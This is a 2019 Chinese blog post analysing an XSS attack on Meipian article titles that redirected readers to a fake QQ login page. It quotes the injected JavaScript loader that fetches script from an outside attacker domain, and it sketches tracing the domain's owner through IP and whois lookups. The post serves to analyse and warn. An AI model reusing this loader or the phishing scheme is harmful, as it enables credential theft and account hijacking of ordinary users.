一次有趣的xss攻击分析及溯源

发布于 2019-07-12  140 次阅读


        今天突然收到我朋友发来的一个消息,有点懵逼,直接发图⑧。


(第一次截图只有两万的阅读量,50分钟后,如上图,已经涨了17万。爆炸式增长呀。)

点开看看,标题里有什么怪怪的东西。

这很明显是个XSS攻击利用嘛。

用view-source看一下q.php里有什么


function loadJs(e) { var t = document.createElement("script"), n = document.getElementsByTagName("script")[0]; t.src = e, t.type = "text/javascript", t.async = !0, n.parentNode.insertBefore(t, n) } function loadPage() { document.title = '鍔犺浇涓�...'; loadJs("//puxt.cn/qq.php"); } loadPage();

emm..对的她本来就写的这么乱,不过依然可以看出来是再跳到了puxt.cn/qq.php。

实测的确是如此,我自己试了一下,安卓端QQ的内置浏览器在进入页面后1s左右就会跳到qq.php。

图中键盘是假的啦。

再看一下qq.php。

emmm看来需要解密

用UnEscape解密后,大概是这样。

精心伪造的登陆界面吗

很明显,这就是上面图里的登陆界面,从没有“手机一键登录”这点也可以看出,这是假的。

那么,puxt.cn/qqapi.js应该是作者用来进行操作的关键了。

不过,我写到这里的时候,文件已经404了。。(可能是因为知道网址已经被举报了就删掉了?

从之前的操作来看,文件实现了两个功能

1.记密码

2.登录后自动转发消息

看来这不只是刷阅读量,还有盗号的可能。

再来扒扒作者是何方神圣?

我直接访问了puxt.cn.看到的是宝塔控制面板安装完成后的默认界面,看来时间挺紧的?用的是宝塔,可能对建站也不是很熟练吧。

再ping一下,返回的IP是 47.244.240.88,归属地香港阿里云,果然是境外机子呀,不过买阿里云干事还是可能会被查水表⑧。

whois查一下,新网,那域名应该也是在阿里云注册的。

如果这个人就是作者呢?

看名字,女的嘛? 搜一下QQ看看?

彳亍口巴

信息好像还挺符合的,看样子是一个人,不是团体。

emm就查到这里⑧,挖人不是好习惯。

各位要小心辣,美篇(meipian.cn)目前存在的逻辑漏洞可能导致包括电脑,手机在内的设备受到攻击,看到类似的标题就要多提防一下!